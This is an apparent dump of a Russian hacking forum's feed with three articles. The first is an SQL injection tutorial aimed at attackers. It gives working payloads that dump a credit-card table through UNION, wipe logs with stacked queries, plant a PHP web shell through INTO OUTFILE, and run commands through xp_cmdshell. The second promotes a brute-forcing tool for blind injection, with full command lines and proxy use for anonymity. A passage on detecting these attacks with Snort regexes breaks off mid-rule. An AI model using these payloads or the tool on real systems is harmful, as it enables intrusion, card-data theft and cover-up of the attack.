						&lt;p&gt;&amp;#160; &amp;#160; Язык SQL достаточно удобен и очень прост для изучения, благодаря чему он получил такое широкое распространение - большая часть мало-мальски серьезных cgi-скриптов работают с базами данных, используя SQL.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Любая база данных - это набор таблиц, предназначенных для хранения однотипной информации. Каждая таблица имеет имя и состоит из записей. Запись - это своего рода единица информации, хранимая в базе данных. Информация в записи поделена на поля. Вот пример таблицы:&lt;/p&gt;
						&lt;p&gt;cc_type, cc_number, cc_holder - названия полей.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Вторая строка - это запись.&lt;/p&gt;
						&lt;p&gt;Visa, 123, Agent Smith - значения полей записи.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; При помощи языка SQL можно производить различные операции с базой данных, таблицами и записями. Основные команды языка:&lt;/p&gt;
						&lt;p&gt;SELECT - извлечение инфы из таблицы.&lt;/p&gt;
						&lt;p&gt;INSERT - добавление записи в таблицу.&lt;/p&gt;
						&lt;p&gt;UPDATE - изменение записи.&lt;/p&gt;
						&lt;p&gt;DELETE - удаление записи.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Простейшее SQL-выражение может выглядеть так:&lt;/p&gt;
						&lt;p&gt;SELECT cc_number, cc_holder FROM cc_table WHERE cc_type=&#039;visa&#039;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Ключевое слово FROM указывает таблицу, к которой будет применяться это выражение. После необязательного WHERE идет условие, определяющее, по каким параметрам будут отфильтровываться записи таблицы. Результатом данного запроса станет извлечение из таблицы cc_table записей, в которых поле cc_type имеет значение &#039;visa&#039;. Программе, передавшей данный запрос базе данных, будут возращены не полные записи, а только поля cc_number и cc_holder.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; После WHERE может содержаться несколько условий, разделенных логическими операторами:&lt;/p&gt;
						&lt;p&gt;WHERE cc_type=&#039;visa&#039; AND cc_number=1234 OR cc_number=4321&lt;/p&gt;
						&lt;p&gt;Как было сказано, добавление записей производится командой INSERT. Вот пример запроса:&lt;/p&gt;
						&lt;p&gt;INSERT INTO cc_table VALUES (&#039;amex&#039;, 12345, &#039;Neo&#039;)&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Результатом обработки запроса станет добавление в таблицу cc_table новой записи, в которой поле cc_type примет значение &#039;amex&#039;, cc_number - 12345, cc_holder - &#039;Neo&#039;.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Вот пример с UPDATE:&lt;/p&gt;
						&lt;p&gt;UPDATE cc_table SET cc_number=12345 WHERE cc_holder=&#039;Agent Smith&#039;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Здесь произойдет просмотр таблицы cc_table. Если в соответствующих записях значение поля cc_holder будет равно &#039;Agent Smith&#039;, то значение cc_number сменится на 12345.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; А это запрос DELETE:&lt;/p&gt;
						&lt;p&gt;DELETE FROM cc_table WHERE cc_type=&#039;visa&#039;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Удалятся все записи из таблицы, где поле cc_type равно значению &#039;visa&#039;.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; На этом небольшой ликбез по SQL закончился. Теперь можно приступить к самому вкусному. Тому, ради чего поднялся весь сыр-бор: SQL injection.&lt;/p&gt;
						&lt;p&gt;SQL injection&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Суть ошибок класса SQL injection состоит в том, что из-за некорректной обработки данных, передаваемых скрипту, потенциальный хакер может изменить составляемый скриптом SQL-запрос со всеми вытекающими отсюда последствиями. К примеру, в случае с инет-магазином, он может таким образом изменить запрос, что SQL-сервер после его обработки выдаст все содержимое таблицы, в которой содержится инфа о предыдущих клиентах магазина, включая номера их кредитных карточек и т.д. и т.п.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Это может выглядеть следующим образом. Предположим, что в составе интернет-магазина присутствует скрипт, принимающий от юзера логин и пароль и выдающий инфу о его предыдущих покупках, номерах карточек и т.д. Логин и пароль загоняются скриптом в следующее SQL-выражение, которое передается серверу базы данных:&lt;/p&gt;
						&lt;p&gt;SELECT * FROM clients WHERE login=&#039;$login&#039; AND password=&#039;$password&#039;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; В результате обработки данного выражения сервер возвращает скрипту все записи в таблице, соответствующие логину юзверя.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Данные, введенные юзверем ($login и $password), берутся из web-формы и напрямую подставляются в это SQL-выражение. Отсюда появляется возможность хитрым образом так задать логин и пароль, что логика SQL-выражения немного изменится, в результате чего сервер базы данных возвратит записи из таблицы clients, соответствующие всем клиентам магазина со всеми данными о них. К примеру, это можно сделать так: в качестве логина задать такую строку: &amp;quot;nobody&#039; OR &#039;&#039;=&#039;&amp;quot;, а в качестве пароля &amp;quot;nopassword&#039; OR &#039;&#039;=&#039;&amp;quot;. С использованием этих данных скрипт сформирует такое выражение:&lt;/p&gt;
						&lt;p&gt;SELECT * FROM clients WHERE login=&#039;nobody&#039; OR &#039;&#039;=&#039;&#039; AND password=&#039;nopassword&#039; OR &#039;&#039;=&#039;&#039;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; И под это SQL-выражение будут попадать все записи таблицы clients, т.к. login=&#039;nobody&#039; OR &#039;&#039;=&#039;&#039; и password=&#039;nopassword&#039; OR &#039;&#039;=&#039;&#039; всегда будут истинными. Так хакеры и ломают многие базы данных.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Собственно говоря, мы сделали то, что принято называть SQL injection. Дальше же будут приведены некоторые особо часто используемые трюки, которые проворачивают, если есть хоть какая-то возможность повлиять на SQL-выражение.&lt;/p&gt;
						&lt;p&gt;UNION&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; В предыдущем примере мы предположили, что вся инфа о юзверях содержится в таблице clients. Немного изменим условия. Допустим, в таблице clients находятся просто записи о клиентах - имена, фамилии и т.д. Номера же кредитных карточек располагаются в другой таблице, допустим, cards. Соответственно, теперь стоит задача вытянуть инфу из этой таблицы, смодифицировав уже указанный выше запрос:&lt;/p&gt;
						&lt;p&gt;SELECT * FROM clients WHERE login=&#039;$login&#039; AND password=&#039;$password&#039;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Здесь на помощь приходит такой элемент языка SQL, как UNION. UNION обычно используется в случае необходимости объединить результаты обработки двух запросов в один:&lt;/p&gt;
						&lt;p&gt;SELECT smth FROM table1 UNION SELECT smth FROM table2&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Заюзав UNION, можно добавить еще один SELECT, который будет извлекать инфу из таблицы cards. Для этого в качестве пароля в форме может быть задано что-то вроде этого:&lt;/p&gt;
						&lt;p&gt;&#039; UNION SELECT * FROM cards WHERE &#039;&#039;=&#039;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; В итоге получается:&lt;/p&gt;
						&lt;p&gt;SELECT * FROM clients WHERE login=&#039;nologin&#039; AND password=&#039;nopassword&#039; UNION SELECT * FROM cards WHERE &#039;&#039;=&#039;&#039;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; После приема такого запроса произойдет вывод всего содержимого таблицы cards.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; При использовании UNION необходимо учитывать следующий момент. Оба SELECT&#039;а должны выдавать одинаковое количество столбцов, иначе произойдет глюк. Грубо говоря, если в таблице clients - всего 4 столбца, а в cards - 5, вышеуказанный пример работать не будет. Чтобы он все-таки заработал, надо задать не &amp;quot;SELECT *&amp;quot;, а, например, &amp;quot;SELECT type, number, holder, address&amp;quot;.&lt;/p&gt;
						&lt;p&gt;Использование разделителей SQL-выражений&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Если sql-сервер позволяет задавать в одном запросе несколько SQL-выражений, разделенных некоторым символом, то это открывает перед потенциальным атакующим более широкие возможности. Следует отметить, что фичи такого рода поддерживаются далеко не всеми серверами баз данных. К примеру, Microsoft SQL Server позволяет это делать, интерпретируя в качестве разделителя символ &#039;;&#039;, а MySQL - нет.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Опять небольшой пример с использованием того же SQL-выражения, что и выше. Допустим, веб-магазин использует базу данных, крутящуюся на скульном сервере от Дяди Билли. Допустим также, что атакующему надо почистить логи, которые скрипт сохраняет в таблицу logs, содержащую поле с именем remote_ip. Ему надо удалить все записи, содержащие в поле remote_ip его IP-адрес. Удаление записей производится при помощи SQL-команды DELETE. Соответственно, удаление логов может выполняться командой:&lt;/p&gt;
						&lt;p&gt;DELETE FROM logs WHERE remote_ip=&#039;IP address&#039;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Без использования разделителей совместить оригинальное выражение&lt;/p&gt;
						&lt;p&gt;SELECT * FROM clients WHERE login=&#039;$login&#039; AND password=&#039;$password&#039;&lt;/p&gt;
						&lt;p&gt;с DELETE затруднительно. А с их использованием все делается на раз-два. Достаточно в качестве пароля забить в форму, например, &amp;quot;nopassword&#039;; DELETE FROM logs WHERE remote_ip=&#039;10.0.0.2&amp;quot;, и все становится на свои места:&lt;/p&gt;
						&lt;p&gt;SELECT * FROM clients WHERE login=&#039;nologin&#039; AND password=&#039;nopassword&#039;; DELETE FROM logs WHERE remote_ip=&#039;10.0.0.2&#039;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Теперь логи почищены.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Естественно, что помимо DELETE после разделителя можно забить ЛЮБУЮ SQL-конструкцию, поддерживаемую сервером: SELECT, INSERT, UPDATE и т.д.&lt;/p&gt;
						&lt;p&gt;Вывод в файл&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Некоторые SQL-сервера позволяют выводить результаты обработки SQL-выражений во внешний файл. Когда это может быть полезным? Самое первое, что может прийти на ум хакеру - это собрать какой-нить скрипт, облегчающий дальнейшее юзание сервера. К примеру, php-шелл.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; В сервере MySQL вывод в файл происходит посредством команды INTO OUTFILE. В простейшем случае это делается так:&lt;/p&gt;
						&lt;p&gt;INSERT &#039;&amp;lt;? system($cmd) ?&amp;gt;&#039; INTO OUTFILE /www/inetshop/htdocs/shell.php&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Если наш вебшоп с багой &amp;quot;крутится&amp;quot; на MySQL, то втупую проинжектить select этим запросом не получится - MySQL, к сожалению, не поддерживает разделителей.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Ситуацию спасает то, что &amp;quot;INTO OUTFILE&amp;quot; может использоваться вместе с SELECT&#039;ом, выдавая результат обработки запроса (т.е. содержимое таблицы) не скрипту, сделавшему запрос, а напрямую в файл. Но тут возникает еще одна проблема. Нужная строка, которую надо записать в файл, должна уже присутствовать в базе. Если в магазине присутствует скрипт регистрации, то что мешает зарегистрироваться и в качестве имени юзера, пароля или еще чего-нибудь задать нужную строку? После регистрации надо сделать так, чтобы оригинальный запрос принял, скажем, такую форму:&lt;/p&gt;
						&lt;p&gt;SELECT * FROM clients WHERE login=&#039;&amp;lt;? system($cmd) ?&amp;gt;&#039; AND password=&#039;our_password&#039; INTO OUTFILE &#039;/www/inetshop/htdocs/shell.php&#039;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Как нетрудно догадаться, для успешного &amp;quot;инжектирования&amp;quot; логин должен быть - &amp;quot;&amp;lt;? system($cmd) ?&amp;gt;&amp;quot;, а пароль - &amp;quot;ourpassword&#039; INTO OUTFILE &#039;/www/inetshop/htdocs/filename&amp;quot;.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; В MS SQL вывод в файл происходит несколько иначе. В поставке с ним идет большое количество модулей, содержащих различные процедуры, которые можно вызывать непосредственно из SQL-выражения. Одна из них - master.dbo.sp_makewebtask - как раз предназначена для вывода результатов выполнения скульных выражений в файл:&lt;/p&gt;
						&lt;p&gt;EXEC sp_makewebtask &#039;c:\inetpub\wwwroot\shell.php&#039;, &amp;quot;скульное выражение&amp;quot;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Ключевое слово EXEC предназначено для выполнения внешних процедур, какой и является sp_makewebtask. Используя разделители, эту строчку можно вогнать в поле веб-формы, предназначенное для пароля, и получить на выходе отличный скриптец.&lt;/p&gt;
						&lt;p&gt;Исполнение команд шелла&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Иногда можно избежать процесса сборки скриптов, т.е. не использовать средства вывода в файл, а сделать выполнение команд шелла прямо из SQL-выражения. Эта фича, естественно, не входит в спецификацию языка SQL, поэтому, как и вывод в файл, ее наличие или отсутствие полностью лежит на совести разработчика сервера.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Например, исполнение шелл-команд возможно в MS SQL Server путем использования процедуры master.dbo.xp_cmdshell. Юзается это довольно просто. Вот пример SQL-выражения:&lt;/p&gt;
						&lt;p&gt;EXEC master.dbo.xp_cmdshell &#039;cmd.exe dir&#039;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Вкупе с тем, что MS SQL поддерживает разделители (&#039;;&#039;), вызов внешних процедур при проведении атаки проходит на ура. С тем самым магазином атакующему достаточно в качестве пароля ввести всего лишь &amp;quot;&#039; EXEC master.dbo.xp_cmdshell &#039;cmd.exe dir&amp;quot;.&lt;/p&gt;
						&lt;p&gt;Some tricks&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Во многих приведенных выше примерах предполагалось, что потенциальный атакующий знает названия таблиц и полей в них. В реальной жизни это не всегда так - зачастую приходится иметь дело с самописными скриптами, исходники которых попросту недоступны. Но, как говорится, на каждую хитрую...&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; В подавляющем большинстве серверов инфа обо всех базах, поддерживаемых сервером, хранится в системных таблицах, имена которых имеют дефолтовые названия. То же самое относится и к названиям полей в них. В этих таблицах можно найти исчерпывающую информацию, касающуюся структуры любой базы данных на сервере. Далее приведена небольшая подборка названий таблиц для разных серверов. Для получения подробной информации о содержимом этих таблиц было бы неплохо глянуть в документацию по конкретному серверу, хотя до смысла большинства полей можно логически дойти, просто заселектив все их содержимое:&lt;/p&gt;
						&lt;p&gt;1) MS SQL&lt;/p&gt;
						&lt;p&gt;sysobjects&lt;/p&gt;
						&lt;p&gt;syscolumns&lt;/p&gt;
						&lt;p&gt;2) MySQL&lt;/p&gt;
						&lt;p&gt;mysql.user&lt;/p&gt;
						&lt;p&gt;mysql.host&lt;/p&gt;
						&lt;p&gt;mysql.db&lt;/p&gt;
						&lt;p&gt;3) Oracle&lt;/p&gt;
						&lt;p&gt;SYS.USER_OBJECTS&lt;/p&gt;
						&lt;p&gt;SYS.USER_TABLES&lt;/p&gt;
						&lt;p&gt;SYS.USER_VIEWS&lt;/p&gt;
						&lt;p&gt;SYS.USER_TAB_COLUMNS&lt;/p&gt;
						&lt;p&gt;SYS.TAB&lt;/p&gt;
						&lt;p&gt;SYS.ALL_TABLES&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Защита от подобного&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Чтобы защитить свои скрипты от подобной напасти, необходимо тщательно проверять всю входящую информацию. Нельзя доверять пользователям. Минимум, что надо делать, это удалять следующие символы:&lt;/p&gt;
						&lt;p&gt;1) Кавычки.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; И двойные, и одинарные. С их помощью можно добавлять левые параметры в запрос.&lt;/p&gt;
						&lt;p&gt;2) Точка с запятой.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Она разделяет запросы (не во всех sql-серверах; mysql, например, этого не поддерживает). Ее наличие может привести к добавлению левых команд в SQL-запрос.&lt;/p&gt;
						&lt;p&gt;Также стоит проверять и другие символы, например, подчеркивание (_), знак процента (%), звездочка (*). Все они могут привести к нежелательным последствиям, поэтому очень важно отфильтровывать лишние данные.&lt;/p&gt;
						&lt;p&gt;Заключение&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Нельзя сказать, что тема атак класса SQL Injection полностью рассмотрена. Каждая реализация SQL-сервера имеет свои особенности, которые потенциальный взломщик может использовать себе на благо. Естественно, для этого надо хорошо разбираться в том или ином диалекте языка SQL. Но самых популярных серверов на сегодняшний день всего несколько: MySQL, Postgres, MS SQL, Oracle. Для их защиты, особенно в случае с MySQL и Postgres, не требуется больших усилий. Главное грамотно проверять входящие данные. Это как минимум спасет твой сайт от утечки данных через скрипты. Так что помни об этом. Удачи!&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Stemp-Admin)</author>
			<pubDate>Thu, 18 Jun 2009 01:44:56 +0400</pubDate>
			<guid>http://xakforum.mybb.forum/viewtopic.php?pid=20#p20</guid>
		</item>
		<item>
			<title>Автоматизированная эксплуатация SQL Injection</title>
			<link>http://xakforum.mybb.forum/viewtopic.php?pid=19#p19</link>
			<description>&lt;p&gt;Введение &lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Я уверен, что тебе не раз приходилось тратить довольно много времени на такое нудное и малоинтересное занятие, как определение количества столбцов между SELECT и WHERE, перебор названий таблиц, посимвольный брутфорс при атаках вида SQL Injection. Не удивлюсь, если ты скажешь, что тебе уже порядком надоело делать это вручную, каждый раз встречая эту уязвимость. Данная статья рассчитана на человека, знакомого со SQL инъекциями - в ней мы рассмотрим методы их автоматизированной эксплуатации на примере использования PHP скрипта SQLBruter 0.2 (скачать), созданного мною специально для этих целей. &lt;/p&gt;
						&lt;p&gt;Изучение работы скрипта &lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Прежде всего давай проанализируем все возможности, а также обязательные параметры для запуска скрипта. Итак, программа предоставляет четыре способа перебора: &lt;/p&gt;
						&lt;p&gt;1. перебор количества выбираемых полей;&lt;br /&gt;2. названий таблиц; &lt;br /&gt;3. названий столбцов; &lt;br /&gt;4. посимвольный перебор; &lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Кроме того, в скрипте предусмотрен вывод результатов в лог-файл и использование прокси для твоей анонимности. В качестве обязательных параметров тебе необходимо указать хост для подключения, путь к скрипту с уязвимым параметром и, конечно же, тип перебора. Таким образом, запуск программы осуществляется по следующей схеме: &lt;br /&gt;php sqlbruter.php HOST PATH MODE ADDITIONAL_PARAMS OPTIONS&lt;br /&gt;где MODE - порядковый номер метода перебора. Что касается дополнительных параметров, то они зависят от конкретного способа брута. &lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Весь принцип работы скрипта основывается на поиске строки, указанной пользователем через параметр &amp;lt;string&amp;gt;, в возвращенном ответе сервера на неверный запрос. Если она найдена, то программа будет продолжать перебор до тех пор, пока сервер не вернет совершенно иной ответ, то есть при выполнении условия. Думаю, здесь все просто и понятно, однако для правильной работы прежде всего нужно точно определить параметр &amp;lt;string&amp;gt;. Для этого необходимо выяснить реакцию web-приложения на запрос, содержащего кавычку в конце уязвимого параметра. В некоторых случаях в ответе сервера мы можем увидеть такую фразу: &lt;br /&gt;MySQL error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘…’ at line.&lt;br /&gt;Это означает, что разработчик скрипта позаботился о выводе ошибок, и при попытке подстановки неверного количества столбцов сервер всегда возвратит строку &lt;br /&gt;&amp;quot;The used SELECT statements have a different number of columns&amp;quot;.&lt;br /&gt;Однако в большинстве случаев выводится стандартная ошибка &lt;br /&gt;PHP: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in z:\home\localhost\www\hackme.php on line 2.&lt;br /&gt;Стоит отметить, что тебе нужно передать скрипту строку, которая действительно содержится в ответе. Например, просто указав &lt;br /&gt;Warning: mysql_fetch_array()&lt;br /&gt;ты не получишь корректного результата, потому что в исходнике присутствуют HTML-тэги. Поэтому верным решением было бы - &lt;br /&gt;&amp;lt;b&amp;gt;Warning&amp;lt;/b&amp;gt;: mysql_fetch_array()&lt;br /&gt;Теперь давай рассмотрим каждый из методов перебора более детально.&amp;#160; &lt;br /&gt;Перебор количества выбираемых полей &lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Для этого способа тебе потребуется указать всего один параметр – &amp;lt;string&amp;gt;. Как его определить, ты уже знаешь. Кроме него есть еще один, необязательный аргумент ( -n) , отвечающий за максимальное количество столбцов. Скрипт будет проводить перебор, пока не достигнет этого значения. По умолчанию параметр –n равен пятнадцати. Пример запуска программы для брута количества выбираемых полей:&lt;/p&gt;
						&lt;p&gt;php sqlbruter.php localhost &amp;quot;/index.php?id=1&amp;quot; 1 &amp;quot;The used SELECT statements have a different number of columns&amp;quot; –n=25&lt;/p&gt;
						&lt;p&gt;Перебор названий таблиц &lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Обычно, определив количество столбцов, хакер пытается вывести системную информацию с помощью SQL-функций user(), version(), database(). На основании полученных данных, он продумывает свои дальнейшее действия: если версия MySQL пятая, то ему не составит труда узнать названия всех таблиц благодаря системной базе данных information_schema, в которой также находятся и названия столбцов. Однако в четвертой версии и ниже подобной БД нет, поэтому остается лишь одно средство– брутфорс. Для перебора названий таблиц скрипту необходимо передать три обязательных параметра: &lt;/p&gt;
						&lt;p&gt;&amp;lt;rows&amp;gt; - количество столбцов между SELECT и WHERE &lt;br /&gt;&amp;lt;string&amp;gt; - строка, которую вернул сервер в ответ на неправильный запрос. Обычно при попытке перебора названия таблицы сервер возвращает ошибку &amp;quot;Table &#039;название_таблицы&#039; doesn&#039;t exist&amp;quot;.&lt;/p&gt;
						&lt;p&gt;&amp;lt;dic&amp;gt; - путь к словарю, содержащему предполагаемые названия таблиц. Обрати внимание на то, что если твой словарь содержит выражения языка SQL (например union, outer, select и т.д.), то ты не получишь желаемого результата, так как сервером будет возвращена другая строка и, следовательно, программа будет считать ее удовлетворяющей условию. &lt;br /&gt;Кроме того, у тебя есть возможность указать префикс, который будет подставляться к каждому имени таблицы из словаря, с помощью необязательного параметра –pref. Пример запуска:&lt;/p&gt;
						&lt;p&gt;php sqlbruter.php wwwhost.ru &amp;quot;/index.php?id=1&amp;quot; 2 13 &amp;quot;doesn&#039;t exist&amp;quot; &amp;quot;/home/root/words.dic&amp;quot; –pref=phpbb&lt;/p&gt;
						&lt;p&gt;Перебор названий столбцов &lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Допустим, ты нашел таблицу users, названия столбцов которой тебе неизвестны. В этом случае тебе снова не обойтись без перебора. Для запуска скрипта тебе потребуется указать почти все те же параметры, что и при переборе таблиц, за исключением аргумента &amp;lt;table&amp;gt; - название таблицы, столбцы которой мы будем брутить. Таким образом, запускать программу будем так:&lt;/p&gt;
						&lt;p&gt;php sqlbruter.php 127.0.0.1 &amp;quot;/index.php?id=1&amp;quot; 3 13 &amp;quot;users&amp;quot; &amp;quot;Unknown column&amp;quot; &amp;quot;/home/root/words.dic&amp;quot;&lt;/p&gt;
						&lt;p&gt;Посимвольный перебор &lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Я уверен, что ты слышал про такой вид атак, как blind SQL injection. Как известно, это обычная SQL инъекция, однако не выводятся сообщения об ошибках. Использовать этот способ уместно в случаях, когда версия MySQL третья и ниже, а также, когда мы не имеем возможности непосредственно изменить выводимые данные. Использование скриптов для успешной эксплуатации подобных уязвимостей просто необходимо. В интернете существует множество программ для этих целей, однако я рекомендую применять именно мой скрипт, так как он универсален. Для его запуска в режиме посимвольного перебора нужно указать два обязательных параметра:&lt;/p&gt;
						&lt;p&gt;&amp;lt;query&amp;gt; - запрос, результат выполнения которого мы будем перебирать (например, user(), version(), database()). Если ты указал в качестве параметра &amp;lt;query&amp;gt; запрос типа &amp;quot;SELECT password FROM users WHERE username=&#039;admin&#039;&amp;quot;, то его необходимо заключить в скобки. &lt;br /&gt;&amp;lt;string&amp;gt; - строка, которая должна присутствовать в выведенном ответе web-сервера при выполнении условия.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Также необходимо уделить особое внимание диапазону перебираемых символов. Его можно указать через параметр –r, разделив двоеточием минимальное и максимальное значения порядковых номеров ASCII-символов. Например, аргумент -r равный 48:57 будет соответствовать поиску всех чисел. По умолчанию скрипт перебирает диапазон символов a…z, что соответствует кодам 97…122. Итак, запускаем следующим образом:&lt;/p&gt;
						&lt;p&gt;php sqlbruter.php 127.0.0.1 /index.php?id=1 4 &amp;quot;version()&amp;quot; &amp;quot;Hacked!&amp;quot; -r=48:122&lt;/p&gt;
						&lt;p&gt;Необязательные параметры &lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Как уже упоминалось выше, в скрипте предусмотрены необязательные параметры, общие для каждого из способов перебора. &lt;br /&gt;-o =[file] - вывод результатов в лог-файл (например, -o=&amp;quot;/home/root/result.txt&amp;quot;); &lt;br /&gt;-p=[port] - порт (по умолчанию 80); &lt;br /&gt;-P=[ip:port] - использование прокси (например, -P=127.0.0.1:8080). &lt;br /&gt;Необязательные параметры необходимо указывать только после определения всех остальных. &lt;/p&gt;
						&lt;p&gt;Заключение &lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Надеюсь, в данной статье ты нашел для себя что-то новое и теперь тебе не придется часами гадать названия таблиц. Напоследок стоит сказать, что немаловажную роль в быстродействии работы скрипта играют пропускная способность канала, а также версии PHP и MySQL, установленных на удаленной машине. Например, при раскладе PHP 5.1.2 + MySQL 5.0.18 скорость брута на 35% выше, чем при PHP 4.4.2 + MySQL 4.1.16. Также хочу отметить, что на данный момент существуют аналоги этой программы, например Injection Analyzer от Kuzya.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Stemp-Admin)</author>
			<pubDate>Thu, 18 Jun 2009 01:34:26 +0400</pubDate>
			<guid>http://xakforum.mybb.forum/viewtopic.php?pid=19#p19</guid>
		</item>
		<item>
			<title>Обнаружение SQL инъекций и CSS атак.</title>
			<link>http://xakforum.mybb.forum/viewtopic.php?pid=18#p18</link>
			<description>&lt;p&gt;1. Введение&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; В&amp;#160; данной статье будут обсуждены методы обнаружения SQL инъекций и атак межсайтового скриптинга (CSS атак), при нападении на вашу сеть. Ранее были достачно хорошо осуждены методы предотвращения этих видов атак, однако плохо описывались методы обнаружения нападений. В наших примерах мы будем использовать программу IDS Snort&amp;#160; [3] и составим регулярные выражения, основанные на правилах для обнаружения таких видов атак. Кстати, заданные по умолчанию значения наборов правил Snort&amp;#160; действительно содержит сигнатуры для обнаружения сценариев межсайтового скриптига, но их можно очень легко обойти, используя, например, шестнадцатиричные значения символов типа %3C%73%63%72%69%70%74%3E вместо &amp;lt;script&amp;gt;.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Было написано огромное, граничащее с паранойей, количество правил для обнаружения подобных атак. Если Вы хотите обнаружить любой вариант SQL атаки, то необходимо исключить возможность ввода любого из метасимволов SQL типа одинарной кавычки(&#039;), точки с запятой (;) или двойного тире (--). Точно такой же параноидальный способ обнаружении CSS атак заключается в нахождении угловых скобок (&amp;lt;&amp;gt;), указывающих на HTML-тэг. Но при таких условиях возникает вероятность того, что большое количество правильных выражений, будут распознаны как попытки нападений. Чтобы избежать этого,&amp;#160; необходимо, чтобы условия проверки были более точными и при этом не приводили к неправильной идентификации.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Каждое из таких условий может использоваться как самостоятельно, так и с командами Snort сигнатур, используя ключевое слово pcre [4]. Эти сигнатуры могут также использовать с утилитами типа&amp;#160; grep для проверки файлов регистрации на Web серверах. Но такой способ может использоваться, только если приложения используют GET запросы, т.к. данные о POST запросах не сохраняются в файлах регистрации.&lt;/p&gt;
						&lt;p&gt;2. Регулярные выражения для SQL инъекций.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Важным моментом при выборе вашего регулярного выражения(ий) для обнаружения SQL инъекций является то, что может ввести злоумышленник в поле ввода или поле cookie. Вы должны рассматривать все вводимые пользователем данные как подозрительные. &lt;br /&gt;Как было упомянуто ранее, самое простое регулярное выражение, используемое для обнаружения SQL инъекций, должно обнаруживать определенные метасимволы SQL типа одинарной кавычки или двойного тире. Для обнаружения этих символов и их шестнадцатеричных эквивалентов может использоваться следующие выражение:&lt;/p&gt;
						&lt;p&gt;2.1 Регулярное выражение для определения SQL метасимволов&lt;br /&gt;/(\%27)|(\&#039;)|(\-\-)|(\%23)|(#)/ix &amp;lt;/TD&amp;lt; tr&amp;gt;&lt;/p&gt;
						&lt;p&gt;Пояснения:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Для начала мы обнаруживаем шестнадцатеричный эквивалент одинарной кавычки или непосредственно саму кавычку, а также присутствие двойного тире. Это символы MS SQL Сервер и Oracle, обозначающие начало комментария (т.е. все что следует за этими символами - игнорируется). Дополнительно, в случае использования MySQL, Вы должны проверить присутствие &#039;*&#039; или его шестнадцатеричного эквивалента. Обратите внимание на то, что мы не должны проверять шестнадцатеричный эквивалент двойного тире, т.к. он не является метасимволом HTML и не будет закодирован браузером. Также, если злоумышленник попытается вручную изменить двойное тире на его шестнадцатеричный эквивалент (используя прокси типа Achilles), то в атаке с помощью SQL инъекции&amp;#160; произойдет сбой.&lt;br /&gt;Указанное выше выражение необходимо следующим образом добавить к новому правилу Snort:&lt;br /&gt;alert tcp $EXTERNAL_NET any -&amp;gt; $HTTP_SERVERS $HTTP_PORTS (msg:&amp;quot;SQL 